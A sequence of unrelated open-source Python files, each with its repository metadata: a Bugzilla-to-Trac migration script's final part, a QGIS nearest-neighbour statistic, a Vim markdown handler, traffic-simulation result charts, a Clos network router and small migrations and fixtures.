removed = statusXlator[removed]
elif field_name == "short_desc":
field_name = "summary"
elif field_name == "product" and COMPONENTS_FROM_PRODUCTS:
field_name = "component"
elif ((field_name == "product" and not COMPONENTS_FROM_PRODUCTS) or
(field_name == "component" and COMPONENTS_FROM_PRODUCTS)):
if MAP_ALL_KEYWORDS or removed in KEYWORDS_MAPPING:
kw = KEYWORDS_MAPPING.get(removed, removed)
if kw:
remove_keywords.append(kw)
if MAP_ALL_KEYWORDS or added in KEYWORDS_MAPPING:
kw = KEYWORDS_MAPPING.get(added, added)
if kw:
add_keywords.append(kw)
if field_name == "component":
# just keep the keyword change
added = removed = ""
elif field_name == "target_milestone":
field_name = "milestone"
if added in IGNORE_MILESTONES:
added = ""
if removed in IGNORE_MILESTONES:
removed = ""
ticketChange = {}
ticketChange['ticket'] = bugid
ticketChange['time'] = activity['bug_when']
ticketChange['author'] = trac.getLoginName(mysql_cur,
activity['who'])
ticketChange['field'] = field_name
ticketChange['oldvalue'] = removed
ticketChange['newvalue'] = added
if add_keywords or remove_keywords:
# ensure removed ones are in old
old_keywords = keywords + [kw for kw in remove_keywords if kw
not in keywords]
# remove from new
keywords = [kw for kw in keywords if kw not in remove_keywords]
# add to new
keywords += [kw for kw in add_keywords if kw not in keywords]
if old_keywords != keywords:
ticketChangeKw = ticketChange.copy()
ticketChangeKw['field'] = "keywords"
ticketChangeKw['oldvalue'] = ' '.join(old_keywords)
ticketChangeKw['newvalue'] = ' '.join(keywords)
ticketChanges.append(ticketChangeKw)
if field_name in IGNORED_ACTIVITY_FIELDS:
continue
# Skip changes that have no effect (think translation!).
if added == removed:
continue
# Bugzilla splits large summary changes into two records.
for oldChange in ticketChanges:
if (field_name == "summary"
and oldChange['field'] == ticketChange['field']
and oldChange['time'] == ticketChange['time']
and oldChange['author'] == ticketChange['author']):
oldChange['oldvalue'] += " " + ticketChange['oldvalue']
oldChange['newvalue'] += " " + ticketChange['newvalue']
break
# cc and attachments.isobsolete sometime appear
# in different activities with same time
if field_name in ('cc', 'attachments.isobsolete') and \
oldChange['time'] == ticketChange['time']:
oldChange['newvalue'] += ", " + ticketChange['newvalue']
break
else:
ticketChanges.append (ticketChange)
for ticketChange in ticketChanges:
trac.addTicketChange (**ticketChange)
# For some reason, bugzilla v2.11 seems to clear the resolution
# when you mark a bug as closed. Let's remember it and restore
# it if the ticket is closed but there's no resolution.
if not ticket['resolution'] and ticket['status'] == "closed":
ticket['resolution'] = resolution
bug_status = bug['bug_status']
if bug_status in STATUS_KEYWORDS:
kw = STATUS_KEYWORDS[bug_status]
if kw not in keywords:
keywords.append(kw)
product = bug['product']
if product in KEYWORDS_MAPPING and not COMPONENTS_FROM_PRODUCTS:
kw = KEYWORDS_MAPPING.get(product, product)
if kw and kw not in keywords:
keywords.append(kw)
component = bug['component']
if (COMPONENTS_FROM_PRODUCTS and
(MAP_ALL_KEYWORDS or component in KEYWORDS_MAPPING)):
kw = KEYWORDS_MAPPING.get(component, component)
if kw and kw not in keywords:
keywords.append(kw)
ticket['keywords'] = string.join(keywords)
ticketid = trac.addTicket(**ticket)
if BZ_VERSION >= 2210:
mysql_cur.execute("SELECT attachments.*, attach_data.thedata "
"FROM attachments, attach_data "
"WHERE attachments.bug_id = %s AND "
"attachments.attach_id = attach_data.id" % bugid)
else:
mysql_cur.execute("SELECT * FROM attachments WHERE bug_id = %s" %
bugid)
attachments = mysql_cur.fetchall()
for a in attachments:
author = trac.getLoginName(mysql_cur, a['submitter_id'])
trac.addAttachment(author, a)
print("\n8. Importing users and passwords...")
if BZ_VERSION >= 2164:
selectlogins = "SELECT login_name, cryptpassword FROM profiles"
if IGNORE_DISABLED_USERS:
selectlogins = selectlogins + " WHERE disabledtext=''"
mysql_cur.execute(selectlogins)
users = mysql_cur.fetchall()
else:
users = ()
with open('htpasswd', 'w') as f:
for user in users:
if user['login_name'] in LOGIN_MAP:
login = LOGIN_MAP[user['login_name']]
else:
login = user['login_name']
f.write(login + ':' + user['cryptpassword'] + '\n')
print(" Bugzilla users converted to htpasswd format, see 'htpasswd'.")
print("\nAll tickets converted.")
def log(msg):
print("DEBUG: %s" % msg)
def datetime2epoch(dt) :
import time
return time.mktime(dt.timetuple()) * 1000000
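# Added descriptive note: the * 1000000 converts to the microsecond POSIX
# timestamps used by newer Trac database schemas; time.mktime() interprets the
# naive Bugzilla datetime in the local timezone of the converting machine.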
def usage():
print("""bugzilla2trac - Imports a bug database from Bugzilla into Trac.
Usage: bugzilla2trac.py [options]
Available Options:
--db <MySQL dbname> - Bugzilla's database name
--tracenv /path/to/trac/env - Full path to Trac db environment
-h | --host <MySQL hostname> - Bugzilla's DNS host name
-u | --user <MySQL username> - Effective Bugzilla's database user
-p | --passwd <MySQL password> - Bugzilla's user password
-c | --clean - Remove current Trac tickets before
importing
-n | --noseverities - import Bugzilla severities as Trac
priorities and forget Bugzilla priorities
--help | help - This help info
Additional configuration options can be defined directly in the script.
""")
sys.exit(0)
def main():
global BZ_DB, BZ_HOST, BZ_USER, BZ_PASSWORD, TRAC_ENV, TRAC_CLEAN
global SEVERITIES, PRIORITIES, PRIORITIES_MAP
if len (sys.argv) > 1:
if sys.argv[1] in ['--help','help'] or len(sys.argv) < 4:
usage()
iter = 1
while iter < len(sys.argv):
if sys.argv[iter] in ['--db'] and iter+1 < len(sys.argv):
BZ_DB = sys.argv[iter+1]
iter = iter + 1
elif sys.argv[iter] in ['-h', '--host'] and iter+1 < len(sys.argv):
BZ_HOST = sys.argv[iter+1]
iter = iter + 1
elif sys.argv[iter] in ['-u', '--user'] and iter+1 < len(sys.argv):
BZ_USER = sys.argv[iter+1]
iter = iter + 1
elif sys.argv[iter] in ['-p', '--passwd'] and iter+1 < len(sys.argv):
BZ_PASSWORD = sys.argv[iter+1]
iter = iter + 1
elif sys.argv[iter] in ['--tracenv'] and iter+1 < len(sys.argv):
TRAC_ENV = sys.argv[iter+1]
iter = iter + 1
elif sys.argv[iter] in ['-c', '--clean']:
TRAC_CLEAN = 1
elif sys.argv[iter] in ['-n', '--noseverities']:
# treat Bugzilla severities as Trac priorities
PRIORITIES = SEVERITIES
SEVERITIES = []
PRIORITIES_MAP = {}
else:
print("Error: unknown parameter: " + sys.argv[iter])
sys.exit(0)
iter = iter + 1
convert(BZ_DB, BZ_HOST, BZ_USER, BZ_PASSWORD, TRAC_ENV, TRAC_CLEAN)
if __name__ == '__main__':
main()
|
rbaumg/trac
|
contrib/bugzilla2trac.py
|
Python
|
bsd-3-clause
| 36,535
|
# -*- coding: utf-8 -*-
"""
***************************************************************************
NearestNeighbourAnalysis.py
---------------------
Date : August 2012
Copyright : (C) 2012 by Victor Olaya
Email : volayaf at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Victor Olaya'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, Victor Olaya'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import math
from qgis.core import QgsFeatureRequest, QgsFeature, QgsDistanceArea
from processing.core.GeoAlgorithm import GeoAlgorithm
from processing.core.parameters import ParameterVector
from processing.core.outputs import OutputHTML
from processing.core.outputs import OutputNumber
from processing.tools import dataobjects, vector
class NearestNeighbourAnalysis(GeoAlgorithm):
POINTS = 'POINTS'
OUTPUT = 'OUTPUT'
OBSERVED_MD = 'OBSERVED_MD'
EXPECTED_MD = 'EXPECTED_MD'
NN_INDEX = 'NN_INDEX'
POINT_COUNT = 'POINT_COUNT'
Z_SCORE = 'Z_SCORE'
def defineCharacteristics(self):
self.name, self.i18n_name = self.trAlgorithm('Nearest neighbour analysis')
self.group, self.i18n_group = self.trAlgorithm('Vector analysis tools')
self.addParameter(ParameterVector(self.POINTS,
self.tr('Points'), [ParameterVector.VECTOR_TYPE_POINT]))
self.addOutput(OutputHTML(self.OUTPUT, self.tr('Nearest neighbour')))
self.addOutput(OutputNumber(self.OBSERVED_MD,
self.tr('Observed mean distance')))
self.addOutput(OutputNumber(self.EXPECTED_MD,
self.tr('Expected mean distance')))
self.addOutput(OutputNumber(self.NN_INDEX,
self.tr('Nearest neighbour index')))
self.addOutput(OutputNumber(self.POINT_COUNT,
self.tr('Number of points')))
self.addOutput(OutputNumber(self.Z_SCORE, self.tr('Z-Score')))
def processAlgorithm(self, progress):
layer = dataobjects.getObjectFromUri(self.getParameterValue(self.POINTS))
output = self.getOutputValue(self.OUTPUT)
spatialIndex = vector.spatialindex(layer)
neighbour = QgsFeature()
distance = QgsDistanceArea()
sumDist = 0.00
A = layer.extent()
A = float(A.width() * A.height())
current = 0
features = vector.features(layer)
count = len(features)
total = 100.0 / float(len(features))
for feat in features:
neighbourID = spatialIndex.nearestNeighbor(
feat.geometry().asPoint(), 2)[1]
request = QgsFeatureRequest().setFilterFid(neighbourID)
neighbour = layer.getFeatures(request).next()
sumDist += distance.measureLine(neighbour.geometry().asPoint(),
feat.geometry().asPoint())
current += 1
progress.setPercentage(int(current * total))
do = float(sumDist) / count
de = float(0.5 / math.sqrt(count / A))
d = float(do / de)
SE = float(0.26136 / math.sqrt(count ** 2 / A))
zscore = float((do - de) / SE)
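# Added explanatory comments (Clark-Evans nearest neighbour statistics):
# do = observed mean distance to each point's nearest neighbour,
# de = 0.5 / sqrt(n / A) = expected mean distance under complete spatial
#      randomness for n points in an area A,
# d  = do / de is the nearest neighbour index (< 1 clustered, > 1 dispersed),
# SE = 0.26136 / sqrt(n^2 / A) approximates the standard error of do, and the
#      Z-score measures the departure from randomness.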
data = []
data.append('Observed mean distance: ' + unicode(do))
data.append('Expected mean distance: ' + unicode(de))
data.append('Nearest neighbour index: ' + unicode(d))
data.append('Number of points: ' + unicode(count))
data.append('Z-Score: ' + unicode(zscore))
self.createHTML(output, data)
self.setOutputValue(self.OBSERVED_MD, float(data[0].split(': ')[1]))
self.setOutputValue(self.EXPECTED_MD, float(data[1].split(': ')[1]))
self.setOutputValue(self.NN_INDEX, float(data[2].split(': ')[1]))
self.setOutputValue(self.POINT_COUNT, float(data[3].split(': ')[1]))
self.setOutputValue(self.Z_SCORE, float(data[4].split(': ')[1]))
def createHTML(self, outputFile, algData):
f = open(outputFile, 'w')
for s in algData:
f.write('<p>' + str(s) + '</p>')
f.close()
|
michaelkirk/QGIS
|
python/plugins/processing/algs/qgis/NearestNeighbourAnalysis.py
|
Python
|
gpl-2.0
| 4,670
|
from pycmark.taggedtext.render.VimRenderer import VimRenderer, StringIO
from pycmark.util.TypedTree import TypedTree
from pycmark.taggedtext.TaggedCmarkDocument import TaggedTextDocument
class VimHandler(object):
"""Helper class for vim operations"""
# header text for table of contents window
TOCHEADER = [
'{TAB: switch windows',
'{ENTER: follow link',
'{Ctrl-]: follow links',
'{Ctrl-R: resize',
'{Ctrl-T: toggle TOC',
'{za: toggle TOC fold',
'',
'Contents'
]
def __init__(self, vim):
self.vim = vim # reference to vim module
self.tocBuffer = None # buffer number for table of contents
self.contentBuffer = None # buffer number for rendered markdown
self.renderer = VimRenderer() # rendering object
def parseJSON(self):
inData = '\n'.join(self.vim.current.buffer)
if TypedTree._isSeralizedData(inData):
try:
self.tt = TypedTree._fromjson(inData)
except:
self.vim.command('let g:json_load_ok = 0')
return
self.inData = inData
self.vim.command('only') # ???
self.vim.command('bd') # ???
self.contentBuffer = self.vim.current.buffer.number
for line in self.renderer.genStyle().split('\n'):
self.vim.command(line)
self.vim.command('let g:json_load_ok = 1')
else:
self.vim.command('let g:json_load_ok = 0')
return
def RenderText(self):
contentWindow = [w for w in self.vim.windows if w.buffer.number == self.contentBuffer][0]
nCols = int(contentWindow.width) - int(contentWindow.options['numberwidth'])
buf = StringIO()
doc = TaggedTextDocument.fromAST(self.tt, width=min(nCols, 100))
doc.render(self.renderer.render, writer=buf)
renderedLines = buf.getvalue().split('\n')
self.vim.buffers[self.contentBuffer].options['modifiable'] = True
self.vim.buffers[self.contentBuffer][:] = renderedLines
self.vim.buffers[self.contentBuffer].options['buftype'] = 'nofile'
self.vim.buffers[self.contentBuffer].options['modifiable'] = False
def RenderTOC(self):
self.tree, self.rawfolds, self.folds = self.renderer.getTOC(self.tt, offset=1+len(self.TOCHEADER))
self.vim.current.buffer[:] = self.TOCHEADER + self.tree
for f in self.folds:
self.vim.command('%d,%dfold | normal zR' % f)
for line in self.renderer.genTreeStyle().split('\n'):
self.vim.command(line)
def GenerateFolds(self):
headings = [i for i, b in enumerate(self.vim.current.buffer) if b.startswith('<heading>') and '</heading>' in b]
contentIndices = headings + [len(self.vim.current.buffer)]
if len(headings) > 0:
for a, b in [(i, dict(self.rawfolds).get(i, i)) for i in range(len(self.tree))]:
self.vim.command('%d,%dfold | normal zR' % (contentIndices[a] + 1, contentIndices[b + 1]))
|
daryl314/markdown-browser
|
pycmark/vim/VimHandler.py
|
Python
|
mit
| 3,108
|
import mock
import pytest
from pyleus.storm.serializers.serializer import Serializer
class SerializerTestCase(object):
INSTANCE_CLS = Serializer
@pytest.fixture(autouse=True)
def instance_fixture(self):
self.mock_input_stream = mock.Mock()
self.mock_output_stream = mock.Mock()
self.instance = self.INSTANCE_CLS(
input_stream=self.mock_input_stream,
output_stream=self.mock_output_stream,
)
|
ecanzonieri/pyleus
|
testing/serializer.py
|
Python
|
apache-2.0
| 464
|
from SimulationDAO import *
from constants import *
from DAO import VehiclesDAO
from util import *
import json
import gviz_api
class SimulationExecutionInterface (object):
def __init__(self, sim_exec_id, sim_id):
self.id = sim_exec_id
self.sim_id = sim_id
def getSimulationExecutionDetails(self):
return getSimulationExecutionDetails(self.id)
def getSimulationResult(self):
description = {"count": ("string", "Number of Vehicles"),
"waittime": ("number", "Avg. Wait Time in secs"),
"type": ("string", "Vehicle Type"),
"speed": ("string", "Avg. Speed in mph")}
# get data
loop_data = getSimulationResultByVehicleType(self.id)
# get all vehicle types
sim_id = self.sim_id
vehicle_dao = VehiclesDAO()
vehicle_types = vehicle_dao.readVehicles(str(sim_id))
vehicle_dict = {}
for vehicle in vehicle_types:
vehicle_dict[str(vehicle["_id"])] = vehicle["name"]
data = []
total_vehicles = 0
weighted_speed = 0
total_waittime = 0
#loop through result set and aggregate data to add sum for all vehicle types
for row in loop_data['result']:
vehicle_data = {}
# should not happen, only for experiments
if vehicle_dict.get(row["_id"]) is None:
vehicle_data["type"] = row["_id"]
else:
vehicle_data["type"] = vehicle_dict[row["_id"]]
vehicle_data["speed"] = round(row["speed"], 2)
# calculate average wait time from total
vehicle_data["waittime"] = round(row["waittime"]*1.0/row["count"], 2)
vehicle_data["count"] = row["count"]
total_vehicles += vehicle_data["count"]
weighted_speed += vehicle_data["speed"]*vehicle_data["count"]
total_waittime += row["waittime"]
data.append(vehicle_data)
# add the total row
if total_vehicles != 0:
vehicle_data = {}
vehicle_data["type"] = "All"
vehicle_data["speed"] = round(weighted_speed/total_vehicles, 2)
vehicle_data["waittime"] = round(total_waittime/total_vehicles, 2)
vehicle_data["count"] = total_vehicles
data.append(vehicle_data)
data_table = gviz_api.DataTable(description)
data_table.LoadData(data)
return_data = json.loads(data_table.ToJSon(columns_order=("type", "speed", "waittime", "count"),
order_by="type"))
return return_data
def getInductionLoopResult(self, loop_id, flow_rate_agg):
duration = getSimulationDuration(self.id)
return_data = duration
all_vehicle_types = getDistinctSimulatedVehicleList(self.id, loop_id)
description = {"endtime": ("number", "Time Step")}
# no data is present, return an empty chart
if len(all_vehicle_types) == 0:
description["vehicletype"] = ("number", "Default")
data_table = gviz_api.DataTable(description)
return_data['chart_data'] = data_table.ToJSon()
return return_data
loop_data = getSimulationInducionLoopResult(self.id, loop_id)
aggregation_interval = int(flow_rate_agg)
present_step = aggregation_interval
data = []
vehicle_type_dict = {}
col_order = ("endtime",)
for vehicle_type in all_vehicle_types:
description[vehicle_type] = ("number", vehicle_type)
col_order += (vehicle_type,)
description['All'] = ("number", 'All')
col_order += ('All',)
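# Added descriptive comment: the loop below buckets induction-loop counts into
# fixed windows of `aggregation_interval` seconds. Counts are accumulated per
# vehicle type while a row's endtime is still inside the current window; once a
# row falls past the boundary an aggregate row is emitted at present_step,
# empty windows are padded with zero counts, and the final partial window is
# flushed after the loop.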
for row in loop_data:
# will be 10 initially
if row["endtime"] <= present_step:
if vehicle_type_dict.get(row["vehicletype"]) is None:
vehicle_type_dict[row["vehicletype"]] = row["count"]
else:
vehicle_type_dict[row["vehicletype"]] += row["count"]
# Add entry for all vehicles
if vehicle_type_dict.get('All') is None:
vehicle_type_dict['All'] = row["count"]
else:
vehicle_type_dict['All'] += row["count"]
else:
# add an entry
aggregate_row = {}
# this should be 11, 21 etc.
aggregate_row["endtime"] = present_step
for vehicle in all_vehicle_types:
if vehicle_type_dict.get(vehicle) is None:
aggregate_row[vehicle] = 0
else:
aggregate_row[vehicle] = vehicle_type_dict[vehicle]
aggregate_row['All'] = vehicle_type_dict.get('All')
data.append(aggregate_row)
# reset the dictionary
vehicle_type_dict = {}
present_step += aggregation_interval
while (row["endtime"] > present_step):
aggregate_row = {}
aggregate_row["endtime"] = present_step
for vehicle in all_vehicle_types:
aggregate_row[vehicle] = 0
data.append(aggregate_row)
present_step += aggregation_interval
aggregate_row['All'] = 0
if vehicle_type_dict.get(row["vehicletype"]) is None:
vehicle_type_dict[row["vehicletype"]] = row["count"]
else:
vehicle_type_dict[row["vehicletype"]] += row["count"]
# Add entry for all vehicles
if vehicle_type_dict.get('All') is None:
vehicle_type_dict['All'] = row["count"]
else:
vehicle_type_dict['All'] += row["count"]
# add the last interval
aggregate_row = {}
aggregate_row["endtime"] = row["endtime"]
if len(vehicle_type_dict) != 0:
for vehicle in all_vehicle_types:
if vehicle_type_dict.get(vehicle) is None:
aggregate_row[vehicle] = 0
else:
aggregate_row[vehicle] = vehicle_type_dict[vehicle]
if vehicle_type_dict.get('All') is None:
aggregate_row['All'] = 0
else:
aggregate_row['All'] = vehicle_type_dict['All']
data.append(aggregate_row)
data_table = gviz_api.DataTable(description)
data_table.LoadData(data)
chart_data = data_table.ToJSon(columns_order=col_order,
order_by="endtime")
return_data["chart_data"] = chart_data
return return_data
def getQueueResult(self, loop_id):
description = {"_id": ("number", "Time Step"),
"queueinglength": ("number", "Queue Length")}
data = getSimulationQueueResult(self.id, loop_id)
duration = getSimulationDuration(self.id)
data_table = gviz_api.DataTable(description)
data_table.LoadData(data['result'])
return_data = duration
chart_data = data_table.ToJSon(columns_order=("_id", "queueinglength"),
order_by="_id")
return_data["chart_data"] = chart_data
return return_data
def getInductionDataTable(self, loop_id):
description = {"property": ("string", "Property"),
"value": ("number", "Value")}
idparts = loop_id.split("!")
location_field = idparts[0]
junction_id = idparts[1]
data = []
flow_data = getSimulationInductionFlowRate(self.id, location_field, junction_id)
# should be single row
for flow_row in flow_data['result']:
row = {}
row["property"] = "Number of Vehicles"
row["value"] = flow_row['vehiclecount']
data.append(row)
row = {}
row["property"] = "Flow Rate (Vehicles/s)"
row["value"] = round(flow_row['vehiclecount']*1.0/flow_row['endtime'],3)
data.append(row)
if idparts[0][-2:] == "in":
# get lanes adjacent to the loop_id
adjascent_routes_data = getAdjascentLanes(location_field, junction_id)
lane = adjascent_routes_data[location_field]
adjascent_route_field = location_field + "_adjascent"
adjascent_routes = adjascent_routes_data[adjascent_route_field]
left_lane = adjascent_routes[0]
straight_lane = adjascent_routes[1]
right_lane = adjascent_routes[2]
all_routes_data = getSimulatedVehicleRoutes(self.id)
left = 0
straight = 0
right = 0
for route_row in all_routes_data:
route = route_row['route']
length = len(route)
pos = 0
# only need to check till second last
while pos < length - 1:
# found the lane for the vehicle
if route[pos] == lane:
# check whether the next edge matches any adjacent lane
if (route[pos + 1] == left_lane):
left += 1
elif (route[pos + 1] == straight_lane):
straight += 1
elif (route[pos + 1] == right_lane):
right += 1
pos += 1
row = {}
row["property"] = "Vehicles Turning Left"
row["value"] = left
data.append(row)
row = {}
row["property"] = "Vehicles Moving Straight"
row["value"] = straight
data.append(row)
row = {}
row["property"] = "Vehicles Turning Right"
row["value"] = right
data.append(row)
queue_data = getSimulationInductionQueueResult(self.id, location_field, junction_id)
# should be single row
for queue_row in queue_data['result']:
row = {}
row["property"] = "Average Queue Length in ft"
row["value"] = round(queue_row['queueinglength'], 2)
data.append(row)
row = {}
row["property"] = "Max Queue Duration in secs"
row["value"] = queue_row['maxqueueduration']
data.append(row)
row = {}
row["property"] = "Total Queue Duration in secs"
row["value"] = queue_row['count']
data.append(row)
row = {}
row["property"] = "Total Queue Length in ft"
row["value"] = round(queue_row['totalqueueinglength'], 2)
#print queue_row['totalqueueinglength']
#print queue_row['endtime']
data.append(row)
data_table = gviz_api.DataTable(description)
data_table.LoadData(data)
return_data = json.loads(data_table.ToJSon(columns_order=("property", "value"),
order_by="property"))
return return_data
|
shekharshank/c2sumo
|
src/C3STEM/Middleware/SimulationExecutionInterface.py
|
Python
|
mit
| 9,780
|
# Copyright 2021 DeepMind Technologies Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
|
deepmind/deepmind-research
|
box_arrangement/__init__.py
|
Python
|
apache-2.0
| 594
|
# Clos Routing and Generation
import math
import random
import sys
def route_clos(routing_vector,I,k,N):
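#routing_vector holds one list per BLE with the clos input pins that must
#reach it (-1 = unused pin); the network has I+N input pins in total,
#N BLEs (second-stage outputs) and crossbars of width k.
#Returns the two routed stages [stage1, stage2].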
#In the current tested state, I+N must be divisible by k
if (((I+N) % k) != 0):
print "\n\n-------------- ERROR -----------------------"
print "In the current state, only values for I and N" + \
" are supported where I+N is dividable by k"
print "---------------------------------------------"
sys.exit(0)
#set the count of first stage crossbars
P = int(math.ceil( (N + I)/ k))
#first stage: r=P crossbars with k=m input pins
#this list describe the mapping, between the output pins of this stage
#and the interconnection block input pins.
#so we have P lists in this list with k outputs containing the
#input pin number
stage1 = [[-1 for j in range(k)] for i in range(P)]
#second stage: m=k crossbars with P=r input pins
stage2 = [[-1 for j in range(N)] for i in range(k)]
#tracks whether the routing algorithm was successful
success = 0
#a count to prevent infinite loops.
#breaks out of the outer loop and ends the routing attempt.
#TODO: implement a configurable globs.params variable for this supercount.
supercount = 0
while success == 0 and supercount < 180:
supercount = supercount +1
#just a change of the representation of the routing vector.
#make a list for every used pin of the clos network input,
#append the ble index for this pin.
# give the relation: input pin -> ble number
in_to_out = [[] for i in range(I+N)]
#len routing vector is N. the number of bles.
for bleIndex in range(len(routing_vector)):
#the source pin number.
#pin is referred to the clos network input pin number
for pin in routing_vector[bleIndex]:
#skip unrouted pins
if (pin != -1):
in_to_out[pin].append(bleIndex)
unrouted = []
#made a list 0,1,2,.. to I+N
#describe the input pin numbers in a sequence we try to route them
#start with the first number and end with the last.
#therefore we will shuffle this index list.
pins_to_route = [ i for i in range(len(in_to_out))]
#permute the list
random.shuffle(pins_to_route)
#a counter to prevent infinite loops
count = 0
#permute the target ble numbers of a pin
for pin in pins_to_route:
random.shuffle(in_to_out[pin])
while success == 0 and count < 80:
#a list of unrouted input pins.
#format : list of tuple (input pin number, target ble index)
unrouted = []
count = count + 1
#a list 0,1,2 ... to k=m
#describe the output pin numbers of a crossbar
nlist = [ i for i in range(k)]
random.shuffle(nlist)
#the last routing attempt was not successful; maybe we try it in another sequence.
#therefore we shuffle the index list of pins we want try to route.
random.shuffle(pins_to_route)
#try to route the input pins step by step
for pin in pins_to_route :
#get the crossbar number of the first stage for this input pin
x1 = int(pin/k)
#get the targeted ble index numbers
for dest in in_to_out[pin]:
#index of the output pin of the first stage crossbar, used for the routing
#only set when the complete routing trough both stages was successful
s1 = -1
#index of the output pin of the second stage crossbar, used for the routing
s2 = -1
#try to find a free output pin of the first stage crossbar to route the track
for i in nlist:
#remember: x1 is the crossbar number of the first stage.
# i is the output pin of this crossbar
# pin is the input pin number
#dest is the targeted ble number
#output of the first stage crossbar is free or already used for that pin
if stage1[x1][i] == -1 or stage1[x1][i] == pin: #unused
#see if this will route to desired mux
#the output pin of the corresponding second stage crossbar is free
# or already used for this pin
if stage2[i][dest] == -1 or stage2[i][dest] == pin: #unused
#this two output pins of both crossbars are used for the
#given input pin. save this input pin number
stage1[x1][i] = pin
stage2[i][dest] = pin
#variable to track if this ble was not routable
s1 = i
s2 = dest
break
#there was no possible output pin in the first or second stage crossbar
#to route this input pin number
if s1 == -1:
#save this unrouted pin together with the dest ble index
unrouted.append((pin, dest))
pins_to_route = []
#all pin have been routed
if len(unrouted) == 0:
success = 1
#there are unrouted input pins
for pin, dest in unrouted:
#rip up other routed pins to make room
for iterations in range(1 + int(count/20)): #unroute more pins as we do more iterations
pin_to_unroute = -1
#select the first stage crossbar of the unrouted input pin
x1 = int(pin/k)
# build a list from [ 0,1 to k-1]
#the outputs indexes of the crossbar we want to throw out some tracks
nlist = [ i for i in range(k)]
random.shuffle(nlist)
#this branch pastes -1 into the unroute list and breaks the algorithm
#if random.random() < 0.6:
# for i in nlist:
# #the stage 2 crossbars output pin to the dest ble is not used
# #so we have an input pin number we want to unroute
# if stage2[i][dest] is -1:
# pin_to_unroute = stage1[x1][i]
# break
#just take a random input pin to reroute. should be I+N
#if random.random() < 0.06:
# pin_to_unroute = random.choice(range(I+N))
pin_to_unroute = random.choice(range(I+N))
#there are still unrouted pins but no selection of pins to unroute
#take one random crossbar of the second stage
#and select the pin which leads to the dest ble
#can also break the algo through -1
#if pin_to_unroute < 0:
# pin_to_unroute = stage2[random.randint(0,k-1)][dest]
#we have selected an input pin to reroute but we must
#cancel the routings in the crossbars for this pin
for i in range(P):
for j in range(k):
if stage1[i][j] == pin_to_unroute:
stage1[i][j] = -1
for i in range(k):
for j in range(N):
if stage2[i][j] == pin_to_unroute:
stage2[i][j] = -1
#now we can append the unrouted pin in the route todo list
pins_to_route.append(pin_to_unroute)
#also append the still not routed pin
pins_to_route.append(pin)
if success == 0:
print "\n\n-------------- ERROR -----------------------"
print 'Routing Algo was not able to route the network'
print "---------------------------------------------"
sys.exit(0)
return [stage1, stage2]
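#---------------------------------------------------------------------------
#Illustrative usage sketch (editorial addition, hypothetical values): route a
#tiny clos network with I = 4 inputs, N = 4 BLEs and crossbar width k = 4, so
#that I+N is divisible by k as required above. Each routing-vector entry
#lists the network input pins one BLE must be driven from (-1 = unused).
#---------------------------------------------------------------------------
if __name__ == '__main__':
    example_routing = [[0, -1], [1, 2], [3, -1], [5, 6]]
    stage1, stage2 = route_clos(example_routing, 4, 4, 4)
    print "first stage:", stage1
    print "second stage:", stage2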
|
adbrant/zuma-fpga
|
source/clos_routing.py
|
Python
|
bsd-2-clause
| 8,394
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2016-06-26 19:12
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('pppcemr', '0139_auto_20160626_1511'),
]
operations = [
migrations.AddField(
model_name='encounter',
name='is_billed',
field=models.BooleanField(default=True),
),
]
|
sstebbins/pppcpro
|
pppcemr/migrations/0140_encounter_is_billed.py
|
Python
|
agpl-3.0
| 456
|
# Generated by Django 1.11.21 on 2019-08-27 09:42
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('waldur_vmware', '0020_guest_power_state'),
]
operations = [
migrations.AddField(
model_name='virtualmachine',
name='tools_state',
field=models.CharField(
blank=True,
choices=[
('STARTING', 'Starting'),
('RUNNING', 'Running'),
('NOT_RUNNING', 'Not running'),
],
max_length=50,
verbose_name='Current running status of VMware Tools running in the guest operating system.',
),
),
]
|
opennode/nodeconductor-assembly-waldur
|
src/waldur_vmware/migrations/0021_virtualmachine_tools_state.py
|
Python
|
mit
| 759
|
"""Backends for traces
Available backends
------------------
1. NumPy array (pymc.backends.NDArray)
2. Text files (pymc.backends.Text)
3. SQLite (pymc.backends.SQLite)
The NumPy arrays and text files both hold the entire trace in memory,
whereas SQLite commits the trace to the database while sampling.
Selecting a backend
-------------------
By default, a NumPy array is used as the backend. To specify a different
backend, pass a backend instance to `sample`.
For example, the following would save traces to the file 'test.db'.
>>> import pymc as pm
>>> db = pm.backends.SQLite('test.db')
>>> trace = pm.sample(..., trace=db)
Selecting values from a backend
-------------------------------
After a backend is finished sampling, it returns a MultiTrace object.
Values can be accessed in a few ways. The easiest way is to index the
backend object with a variable or variable name.
>>> trace['x'] # or trace[x]
The call will return a list containing the sampling values of `x` for
all chains. (For a single call to `sample`, the number of chains will
correspond to the `njobs` argument.)
For more control of which values are returned, the `get_values` method
can be used. The call below will return values from all chains, burning
the first 1000 iterations from each chain.
>>> trace.get_values('x', burn=1000)
Setting the `combined` flag will concatenate the results from all the
chains.
>>> trace.get_values('x', burn=1000, combine=True)
The `chains` parameter of `get_values` can be used to limit the chains
that are retrieved.
>>> trace.get_values('x', burn=1000, combine=True, chains=[0, 2])
Some backends also support slicing the MultiTrace object. For example,
the following call would return a new trace object without the first
1000 sampling iterations for all traces and variables.
>>> sliced_trace = trace[1000:]
Loading a saved backend
-----------------------
Saved backends can be loaded using `load` function in the module for the
specific backend.
>>> trace = pm.backends.sqlite.load('test.db')
Writing custom backends
-----------------------
Backends consist of a class that handles sampling storage and value
selection. Three sampling methods of backend will be called:
- setup: Before sampling is started, the `setup` method will be called
with two arguments: the number of draws and the chain number. This is
useful for setting up any structure for storing the sampling values that
requires the above information.
- record: Record the sampling results for the current draw. This method
will be called with a dictionary of values mapped to the variable
names. This is the only sampling function that *must* do something to
have a meaningful backend.
